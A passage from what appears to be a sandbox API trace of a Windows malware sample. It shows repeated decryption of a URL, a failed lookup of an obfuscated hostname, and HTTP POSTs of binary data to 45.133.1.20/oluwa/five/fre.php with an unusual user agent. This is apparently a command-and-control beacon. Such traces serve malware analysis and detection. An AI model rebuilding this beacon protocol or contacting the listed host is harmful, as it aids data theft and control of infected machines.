HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0269.940] GetProcessHeap () returned 0x6a0000 [0269.940] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba5f0 [0269.940] GetProcessHeap () returned 0x6a0000 [0269.941] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0269.941] GetProcessHeap () returned 0x6a0000 [0269.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0269.941] GetProcessHeap () returned 0x6a0000 [0269.941] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0269.942] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0269.943] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0269.943] GetProcessHeap () returned 0x6a0000 [0269.943] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0269.943] GetProcessHeap () returned 0x6a0000 [0269.943] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0269.943] send (s=0x978, buf=0x6bd460*, len=242, flags=0) returned 242 [0269.944] send (s=0x978, buf=0x6bb998*, len=159, flags=0) returned 159 [0269.944] GetProcessHeap () returned 0x6a0000 [0269.944] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6d8f10 [0269.944] recv (in: s=0x978, buf=0x6d8f10, len=4048, flags=0 | out: buf=0x6d8f10*) returned 204 [0270.034] GetProcessHeap () returned 0x6a0000 [0270.034] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0270.035] GetProcessHeap () returned 0x6a0000 [0270.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0270.036] GetProcessHeap () returned 0x6a0000 [0270.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba5f0 | out: hHeap=0x6a0000) returned 1 [0270.036] GetProcessHeap () returned 0x6a0000 [0270.036] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bef48 | out: hHeap=0x6a0000) returned 1 [0270.036] closesocket (s=0x978) returned 0 [0270.037] GetProcessHeap () returned 0x6a0000 [0270.037] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6baa80 | out: hHeap=0x6a0000) returned 1 [0270.037] GetProcessHeap () returned 0x6a0000 [0270.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0270.038] GetProcessHeap () returned 0x6a0000 [0270.038] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0270.038] GetProcessHeap () returned 0x6a0000 [0270.039] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3670 | out: hHeap=0x6a0000) returned 1 [0270.039] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6d8f10, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x16fc) returned 0x978 [0270.040] Sleep (dwMilliseconds=0xea60) [0270.042] GetProcessHeap () returned 0x6a0000 [0270.042] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0270.042] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.043] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0270.053] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.053] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6befd0) returned 1 [0270.063] GetProcessHeap () returned 0x6a0000 [0270.063] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6c7138 [0270.064] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.064] CryptImportKey (in: hProv=0x6befd0, pbData=0x6c7138, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0270.065] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.065] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0270.066] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.066] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0270.066] GetProcessHeap () returned 0x6a0000 [0270.066] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6c7138 | out: hHeap=0x6a0000) returned 1 [0270.069] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.070] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0270.070] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.071] CryptDestroyKey (hKey=0x6ad020) returned 1 [0270.071] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.072] CryptReleaseContext (hProv=0x6befd0, dwFlags=0x0) returned 1 [0270.072] GetProcessHeap () returned 0x6a0000 [0270.072] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0270.072] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.073] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0270.073] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.074] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0270.074] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.074] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0270.075] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.076] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0270.076] GetProcessHeap () returned 0x6a0000 [0270.076] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3490 [0270.076] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0270.080] GetProcessHeap () returned 0x6a0000 [0270.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3490 | out: hHeap=0x6a0000) returned 1 [0270.080] GetProcessHeap () returned 0x6a0000 [0270.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0270.080] GetProcessHeap () returned 0x6a0000 [0270.080] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4910 | out: hHeap=0x6a0000) returned 1 [0270.081] GetProcessHeap () returned 0x6a0000 [0270.081] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0270.081] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.082] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0270.087] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.087] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bf058) returned 1 [0270.098] GetProcessHeap () returned 0x6a0000 [0270.098] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0270.099] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.100] CryptImportKey (in: hProv=0x6bf058, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad4e0) returned 1 [0270.100] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.127] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0270.131] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.132] CryptSetKeyParam (hKey=0x6ad4e0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0270.132] GetProcessHeap () returned 0x6a0000 [0270.132] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0270.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.136] CryptDecrypt (in: hKey=0x6ad4e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0270.137] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.137] CryptDestroyKey (hKey=0x6ad4e0) returned 1 [0270.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.141] CryptReleaseContext (hProv=0x6bf058, dwFlags=0x0) returned 1 [0270.141] GetProcessHeap () returned 0x6a0000 [0270.141] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0270.142] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.142] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0270.143] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.143] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0270.144] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.145] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0270.181] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.182] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0270.182] GetProcessHeap () returned 0x6a0000 [0270.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0270.182] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0270.182] GetProcessHeap () returned 0x6a0000 [0270.182] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6bab00 [0270.182] socket (af=2, type=1, protocol=6) returned 0x97c [0270.183] connect (s=0x97c, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0270.212] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0270.212] GetProcessHeap () returned 0x6a0000 [0270.212] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6beb90 [0270.213] GetProcessHeap () returned 0x6a0000 [0270.213] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0270.213] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0270.214] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0270.214] GetProcessHeap () returned 0x6a0000 [0270.214] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba3b0 [0270.214] GetProcessHeap () returned 0x6a0000 [0270.215] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0270.215] GetProcessHeap () returned 0x6a0000 [0270.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4d48 [0270.215] GetProcessHeap () returned 0x6a0000 [0270.215] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x1fdc) returned 0x6dc730 [0270.216] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0270.217] wvsprintfA (in: param_1=0x6dc730, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 2D36A626\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 242 [0270.217] GetProcessHeap () returned 0x6a0000 [0270.217] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xf4) returned 0x6bd460 [0270.217] GetProcessHeap () returned 0x6a0000 [0270.217] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0270.217] send (s=0x97c, buf=0x6bd460*, len=242, flags=0) returned 242 [0270.218] send (s=0x97c, buf=0x6bb998*, len=159, flags=0) returned 159 [0270.218] GetProcessHeap () returned 0x6a0000 [0270.218] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xfd0) returned 0x6c6f28 [0270.218] recv (in: s=0x97c, buf=0x6c6f28, len=4048, flags=0 | out: buf=0x6c6f28*) returned 204 [0270.288] GetProcessHeap () returned 0x6a0000 [0270.288] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bd460 | out: hHeap=0x6a0000) returned 1 [0270.289] GetProcessHeap () returned 0x6a0000 [0270.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4d48 | out: hHeap=0x6a0000) returned 1 [0270.289] GetProcessHeap () returned 0x6a0000 [0270.289] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6ba3b0 | out: hHeap=0x6a0000) returned 1 [0270.290] GetProcessHeap () returned 0x6a0000 [0270.291] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6beb90 | out: hHeap=0x6a0000) returned 1 [0270.293] closesocket (s=0x97c) returned 0 [0270.295] GetProcessHeap () returned 0x6a0000 [0270.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6bab00 | out: hHeap=0x6a0000) returned 1 [0270.296] GetProcessHeap () returned 0x6a0000 [0270.296] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0270.296] GetProcessHeap () returned 0x6a0000 [0270.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0270.297] GetProcessHeap () returned 0x6a0000 [0270.297] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0270.298] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x6c6f28, dwCreationFlags=0x0, lpThreadId=0x19ff08 | out: lpThreadId=0x19ff08*=0x1700) returned 0x97c [0270.301] Sleep (dwMilliseconds=0xea60) [0270.304] GetProcessHeap () returned 0x6a0000 [0270.304] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4be0 [0270.305] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.305] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0270.311] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.311] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0270.321] GetProcessHeap () returned 0x6a0000 [0270.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0270.322] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.322] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0270.323] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.323] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0270.324] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.326] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0270.326] GetProcessHeap () returned 0x6a0000 [0270.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0270.328] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.328] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4be0, pdwDataLen=0x19fcfc | out: pbData=0x6b4be0, pdwDataLen=0x19fcfc) returned 1 [0270.329] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.329] CryptDestroyKey (hKey=0x6ad020) returned 1 [0270.330] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.330] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0270.330] GetProcessHeap () returned 0x6a0000 [0270.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0270.335] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.335] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0270.338] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.338] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0270.339] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.339] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0270.339] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.340] StrStrA (lpFirst="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0270.340] GetProcessHeap () returned 0x6a0000 [0270.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0270.340] getaddrinfo (in: pNodeName="ËÊÑÎÌÌÑÎÑÍÏÐ\x90\x93\x8a\x88\x9eÐ\x99\x96\x89\x9aÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x0) returned 11001 [0270.340] GetProcessHeap () returned 0x6a0000 [0270.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b3800 | out: hHeap=0x6a0000) returned 1 [0270.341] GetProcessHeap () returned 0x6a0000 [0270.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6a8658 | out: hHeap=0x6a0000) returned 1 [0270.341] GetProcessHeap () returned 0x6a0000 [0270.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b4be0 | out: hHeap=0x6a0000) returned 1 [0270.342] GetProcessHeap () returned 0x6a0000 [0270.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x40) returned 0x6b4910 [0270.342] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.342] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19fca8*=0x0) returned 1 [0270.348] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.348] CryptAcquireContextW (in: phProv=0x19fca8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19fca8*=0x6bef48) returned 1 [0270.354] GetProcessHeap () returned 0x6a0000 [0270.354] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x24) returned 0x6b0c10 [0270.354] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.355] CryptImportKey (in: hProv=0x6bef48, pbData=0x6b0c10, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19fcac | out: phKey=0x19fcac*=0x6ad020) returned 1 [0270.355] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.356] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x4, pbData=0x19fca4*=0x1, dwFlags=0x0) returned 1 [0270.356] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.357] CryptSetKeyParam (hKey=0x6ad020, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0270.357] GetProcessHeap () returned 0x6a0000 [0270.357] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6b0c10 | out: hHeap=0x6a0000) returned 1 [0270.360] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.360] CryptDecrypt (in: hKey=0x6ad020, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x6b4910, pdwDataLen=0x19fcfc | out: pbData=0x6b4910, pdwDataLen=0x19fcfc) returned 1 [0270.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.361] CryptDestroyKey (hKey=0x6ad020) returned 1 [0270.361] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x74810000 [0270.362] CryptReleaseContext (hProv=0x6bef48, dwFlags=0x0) returned 1 [0270.362] GetProcessHeap () returned 0x6a0000 [0270.362] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x212) returned 0x6a8658 [0270.362] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.363] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="http://") returned 0x0 [0270.363] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.364] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="https://") returned 0x0 [0270.364] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.365] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch="/") returned="/oluwa/five/fre.php" [0270.365] LoadLibraryW (lpLibFileName="shlwapi") returned 0x77680000 [0270.365] StrStrA (lpFirst="45.133.1.20/oluwa/five/fre.php", lpSrch=":") returned 0x0 [0270.366] GetProcessHeap () returned 0x6a0000 [0270.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x20) returned 0x6b3800 [0270.366] getaddrinfo (in: pNodeName="45.133.1.20", pServiceName="80", pHints=0x19fcb8*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19fcd8 | out: ppResult=0x19fcd8*=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) returned 0 [0270.366] GetProcessHeap () returned 0x6a0000 [0270.366] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x4) returned 0x6baa90 [0270.366] socket (af=2, type=1, protocol=6) returned 0x980 [0270.366] connect (s=0x980, name=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), namelen=16) returned 0 [0270.388] FreeAddrInfoW (pAddrInfo=0x6b3580*(ai_flags=4, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x6beb50*(sa_family=2, sin_port=0x50, sin_addr="45.133.1.20"), ai_next=0x0)) [0270.388] GetProcessHeap () returned 0x6a0000 [0270.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x7d) returned 0x6befd0 [0270.388] GetProcessHeap () returned 0x6a0000 [0270.388] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x201b) returned 0x6dc730 [0270.389] LoadLibraryW (lpLibFileName="user32") returned 0x75640000 [0270.389] wvsprintfA (in: param_1=0x6dc730, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19fce0 | out: param_1="POST /oluwa/five/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: 45.133.1.20\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 177 [0270.389] GetProcessHeap () returned 0x6a0000 [0270.390] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xb3) returned 0x6ba770 [0270.390] GetProcessHeap () returned 0x6a0000 [0270.390] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6dc730 | out: hHeap=0x6a0000) returned 1 [0270.390] GetProcessHeap () returned 0x6a0000 [0270.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x3e) returned 0x6b4a30 [0270.391] GetProcessHeap () returned 0x6a0000 [0270.391] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, 